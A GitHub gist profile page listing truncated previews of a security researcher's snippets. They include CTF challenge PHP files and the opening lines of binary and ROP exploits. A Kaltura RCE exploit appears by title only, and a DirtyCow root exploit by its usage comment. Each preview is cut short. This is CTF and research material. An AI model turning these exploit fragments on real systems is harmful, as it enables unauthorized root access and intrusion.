Skip to content

Instantly share code, notes, and snippets.

View rverton's full-sized avatar

Robin Verton rverton

139 followers · 56 following
View GitHub Profile
@rverton
rverton / keybase.md
Created October 25, 2017 13:34

Keybase proof

I hereby claim:

  • I am rverton on github.
  • I am roob (https://keybase.io/roob) on keybase.
  • I have a public key ASB7AIRlWYr7z6mxQzopO21ynOCT3d1UjcsegZtkAcnNtwo

To claim this, I am signing this object:

@rverton
rverton / kaltura_unserialize_cookie_rce.py
Created October 24, 2017 16:35
Kaltura <= 13.1.0 Remote Code Execution (CVE-2017-14143)
@rverton
rverton / chrome_headless_screenshot.py
Created July 10, 2017 08:53
Make a screenshot with a headless google chrome in python
# Install chromedriver from https://sites.google.com/a/chromium.org/chromedriver/downloads
import os
from optparse import OptionParser
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
CHROME_PATH = '/usr/bin/google-chrome'
@rverton
rverton / readflag.php
Created April 9, 2017 13:13
ASIS CTF 2017, Tar Bomb Challenge
<?php
header('Access-Control-Allow-Origin: *');
$remote = $_SERVER['REMOTE_ADDR'];
if ($remote === '127.0.0.1' || $remote === '::1') {
$flag = fopen("/flag", "r") or die("Unable to open file!");
echo fread($flag,filesize("/flag"));
fclose($flag);
} else {
echo 'what do you expect to see here?';
@rverton
rverton / admin_console.php
Created April 9, 2017 13:12
ASIS CTF 2017, Tar Bomb Challenge
<?php
session_start();
if ($_COOKIE['tar'] !== 'super-secret-cookie-you-never-know') {
echo "Try better cookie, bro!";
die();
}
if (isset($_POST['url']) && isset($_POST['challenge'])) {
$url = $_POST['url'];
@rverton
rverton / level1-pwn.py
Created March 26, 2017 11:46
exploit for level1.bin (nullcon 2017)
#!/usr/bin/python
# exploit for level1.bin (nullcon 2017)
from pwn import *
def add_book(p):
p.sendline('1')
p.recvuntil('Enter book name: ')
p.sendline('a')
@rverton
rverton / exploit.py
Created November 4, 2016 19:14
ROP Primer level2 - open, read and print flag file
import struct
def p(value):
return struct.pack('<L', value);
writeable_buffer = 0x080ca004
open_addr = 0x80515f0
read_addr = 0x80516a0
write_addr = 0x8051700
@rverton
rverton / bytearray.py
Created October 25, 2016 09:16
Generate a bytearray for badchar detenction.
"""
This script generates a bytearray for badchar detection
and is similar to mona.py's bytearray function.
Usage:
Create bytearray.txt and bytearray.bin (0-255)
$ python bytearray.py
Create bytearray.txt and bytearray.bin and exclude chars
@rverton
rverton / cowroot.c
Created October 21, 2016 14:06
CVE-2016-5195 (DirtyCow) Local Root PoC
/*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd overwritten
@rverton
rverton / test_file_upload.py
Created August 2, 2016 15:00
Test file upload with flask (Python3)
from io import BytesIO
def test_file_upload(client):
data = {
'field': 'value',
'file': (BytesIO(b'FILE CONTENT'), 'test.csv')
}
rv = client.post('/upload', buffered=True,